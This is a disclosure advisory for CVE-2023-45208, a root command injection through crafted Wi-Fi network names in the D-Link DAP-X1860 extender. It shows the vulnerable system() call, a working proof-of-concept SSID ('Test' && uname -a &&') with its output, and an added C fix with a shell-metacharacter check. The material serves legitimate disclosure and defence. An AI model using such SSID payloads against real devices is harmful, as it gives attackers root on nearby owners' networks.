CVE-2023-45208: D-Link DAP-X1860: Remote Command Injection

A command injection in the parsing_xml_stasurvey function inside libcgifunc.so of the D-Link DAP-X1860 repeater 1.00 through 1.01b05-01 allows attackers (within range of the repeater) to run shell commands as root during the setup process of the repeater, via a crafted SSID. Also, network names containing single quotes (in the range of the repeater) can result in a denial of service.


The Wi-Fi network scanning functionality of the D-Link DAP-X1860 range extender is susceptible to remote command injection. Attackers who create a Wi-Fi network with a crafted SSID in range of the extender can run shell commands during the setup process or when using the network scan function of the range extender.

Details

Product: D-Link DAP-X1860
Affected Versions: Tested on 1.00, 1.01b94, 1.01b05-01, other versions may be affected, too
Fixed Versions: Not fixed
Vulnerability Type: Command Injection
Security Risk: medium
Vendor URL: https://eu.dlink.com/de/de/products/dap-x1860-ax1800-mesh-wifi-6-range-extender
Vendor Status: notified, not responding
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-006
Advisory Status: published
CVE: CVE-2023-45208
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45208

Introduction

The D-Link DAP-X1860 is a Mesh Wi-Fi 6 Range Extender.

More Details

During the setup process of the range extender, nearby Wi-Fi networks are identified using the SOAP action "GetSiteSurvey". If a Wi-Fi network whose SSID contains a single tick (a single quote character, as in `Olaf's Network`) is in range of the extender, the setup process crashes repeatedly with the following response from the server:


```
Error 500: Internal Server Error
CGI program sent malformed HTTP headers: [0 1 ***** **:**:**:**:**:** WPA2PSK/AES 7 11b/g/n NONE In 17 YES NO
1 1 ***** **:**:**:**:**:** WPA2PSK/AES 24 11b/g/n NONE In 13 YES NO
2 1 ***** **:**:**:**:**:** WPA2PSK/AES 47 11b/g/n/ax NONE In 13 YES NO
3 1 ***** **:**:**:**:**:** WPAPSKWPA2PSK/TKIPAES 81 11b/g/n NONE In 7 YES NO
4 1 ***** **:**:**:**:**:** WPA2PSKWPA3PSK/AES 63 11b/g/n/ax NONE In 19 YES NO
5 1 ***** **:**:**:**:**:** WPA2PSK/AES 44 11b/g/n/ax NONE In 5 NO NO
6 1 Olafs Network **:**:**:**:**:** WPA2PSK/AES 47 11b/g/n/ax NONE In 20 NO NO
sh: 7: not found
sh
```


The output `sh: 7: not found` indicates that the extender attempted to execute a command, and the single tick that was originally present in the network name `Olaf's Network` is missing from the output. Additionally, the sixth line does not have the same alignment of spaces as the other lines.

This alone can be exploited as a denial-of-service vulnerability, as the setup process cannot be finished. However, it was also possible to execute arbitrary commands on the extender. For instance, an attempt was made to inject the command `uname -a`, which prints general kernel information. To do this, a Wi-Fi network within range was created with an SSID starting with a single tick, followed by the command separated by the shell operator `&&`. The network was started using create_ap [1]:


```
$ create_ap -n wlan0 "Test' && uname -a &&" randompw98zwrd8g283d3
```

After rescanning for Wi-Fi networks on the range extender, this results in an HTTP 500 error code, including the output of the injected command:


```
Error 500: Internal Server Error
CGI program sent malformed HTTP headers: [0 1 ***** **:**:**:**:**:** WPA2PSK/AES 0 11b/g/n NONE In 17 YES NO
1 1 Test
Linux dlink-rp 4.4.198 #3 SMP Mon Jan 11 10:38:51 CST 2021 mips GNU/Linux
sh: **:**:**:**:**:**: not found
sh: 2: not found
sh: 3: not found
sh: 4: not found
[…]
sh: 40: not
```


As can be seen, the command was executed and its output was printed in the response. Further analysis of the device revealed that all processes on the device, including the injected commands, run as the high-privileged root user.

The vulnerability originates from the `parsing_xml_stasurvey` function in libcgifunc.so, where a system command is executed containing the SSIDs from the Wi-Fi scan results without proper escaping:

```c
[…]
snprintf(acStack_1a0,100,"echo %s > /tmp/Channel_check",&scanned_ap_info);
system(acStack_1a0);
[…]
```
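The root cause above is that the SSID, which is attacker-controlled data from the air, becomes part of a shell command line. Escaping the string is the wrong fix, since a single quote inside single quotes ends the quoting again; the robust fix is to never hand the SSID to a shell at all. The following C is an added example (not D-Link's firmware code and not from the advisory) showing the same "write the SSID to a file" step done with stdio instead of `system()`, plus a metacharacter check that a defender could use to log suspicious scan results. The function names, the 32-byte limit, and the `/tmp/channel_check_example` path are assumptions made for this example.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical replacement for the vulnerable pattern; all names here are
 * assumptions made for this example, not identifiers from the D-Link firmware. */

/* IEEE 802.11 limits an SSID to 32 octets; longer input is rejected rather than
 * silently truncated the way the 100-byte snprintf() buffer would truncate it. */
#define MAX_SSID_LEN 32

/* Write the SSID to `path` as plain bytes. No shell is involved, so quote
 * characters and operators such as `&&` are stored literally, not interpreted.
 * Returns 0 on success, -1 on invalid input or I/O failure. */
int write_channel_check(const char *path, const char *ssid)
{
    size_t len = strlen(ssid);
    if (len == 0 || len > MAX_SSID_LEN)
        return -1;

    FILE *f = fopen(path, "w");
    if (f == NULL)
        return -1;

    int ok = (fwrite(ssid, 1, len, f) == len) && (fputc('\n', f) != EOF);
    if (fclose(f) != 0)
        ok = 0;
    return ok ? 0 : -1;
}

/* Read the file back into `buf` (NUL-terminated); returns bytes read or -1. */
int read_channel_check(const char *path, char *buf, size_t bufsz)
{
    FILE *f = fopen(path, "r");
    if (f == NULL)
        return -1;
    size_t n = fread(buf, 1, bufsz - 1, f);
    fclose(f);
    buf[n] = '\0';
    return (int)n;
}

/* Detection aid for logging: does the SSID contain characters a shell would
 * interpret? A legitimate name such as "Olaf's Network" matches too, so this
 * is for auditing scan results, not a substitute for avoiding system(). */
int ssid_has_shell_metachars(const char *ssid)
{
    return strpbrk(ssid, "'\"`$&|;<>()\\\n") != NULL;
}

int main(void)
{
    /* Constructed sample SSID with the shape used in the advisory's PoC. */
    const char *sample = "Test' && uname -a &&";
    const char *path = "/tmp/channel_check_example"; /* example path, not the device's */
    char buf[128];

    if (write_channel_check(path, sample) != 0) {
        perror("write_channel_check");
        return 1;
    }
    read_channel_check(path, buf, sizeof buf);
    printf("stored literally: %s", buf);
    printf("shell metacharacters present: %s\n",
           ssid_has_shell_metachars(sample) ? "yes" : "no");
    return 0;
}
```

If a scan-result file must be produced, opening it directly as above is enough; if an external program really has to consume the SSID, pass it as a separate argv element through `execve()` or `posix_spawn()` rather than interpolating it into a string for `system()`. The metacharacter check is deliberately not used to reject names, because names like `Olaf's Network` are valid and the page shows that such a name alone was enough to crash the setup process.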


Proof of Concept

Create a Wi-Fi network with an SSID containing a single tick, followed by a shell command separator such as `&&` and the command to be run. In the following, create_ap [1] was used to create the Wi-Fi network:


```
$ create_ap -n wlan0 "Test' && uname -a &&" random98zwrd8g283d3
```

To trigger the exploit, run the setup process of the range extender or, if it is already configured, run a network scan. The output of the command can be seen in the HTTP responses of the extender's web interface.

Security Risk

Attackers that are physically located in the Wi-Fi range of the extender may leverage this vulnerability to obtain access to the extender's local network. While the injected commands are only executed during device setup or during a manual Wi-Fi scan, attackers could try to de-authenticate the extender so that the owner triggers a Wi-Fi scan to make the extender work again. As a result, this vulnerability is rated to pose a medium risk.

Timeline

2023-05-06 Vulnerability identified
2023-05-08 Reported to [email protected]
2023-06-19 After receiving no reply, a reminder was sent to [email protected]
2023-07-21 After again receiving no reply, a D-Link security contact known from a previous disclosure was notified directly
2023-08-07 After again receiving no reply, another reminder sent to [email protected]
2023-10-05 CVE ID requested
2023-10-05 CVE ID assigned
2023-10-09 Advisory released

References

[1]: https://github.com/oblique/create_ap

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Through these tests, security weaknesses in company networks or products are uncovered and can be fixed immediately.

As there are only a few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance public knowledge with research in security-related areas. The results are made available as public security advisories.

More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/
